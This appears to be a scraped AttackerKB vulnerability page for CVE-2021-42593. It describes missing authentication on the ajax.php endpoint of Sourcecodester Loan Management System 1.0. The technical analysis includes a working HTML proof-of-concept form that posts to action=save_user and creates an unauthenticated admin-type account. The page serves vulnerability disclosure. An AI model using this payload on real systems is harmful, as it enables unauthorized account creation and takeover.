High
CVE-2021-42593
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
High
(1 user assessed)Very High
(1 user assessed)Unknown
Unknown
Unknown
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.
Add Assessment
Ratings
-
Attacker ValueHigh
-
ExploitabilityVery High
Technical Analysis
An Incorrect Access Control vulnerability exists in Sourcecodester Loan
Management System 1.0. The ajax.php endpoint.
- if we take a look at the source code of the ajax.php file which is responsable for actions ( add, delete , modify users & more ).
- we can see that there is no code to check for a session or the authentication of the user.
The attacker can send a POST requests to add users without any permissions or requirements. Also, without authentication just but send the following request or using the following HTML code:
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://target.com/ajax.php?action=save_user" method="POST"> <input type="hidden" name="id" value="" /> <input type="hidden" name="name" value="CVE" /> <input type="hidden" name="username" value="cve" /> <input type="hidden" name="password" value="cve@password" /> <input type="hidden" name="type" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportGeneral Information
References
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: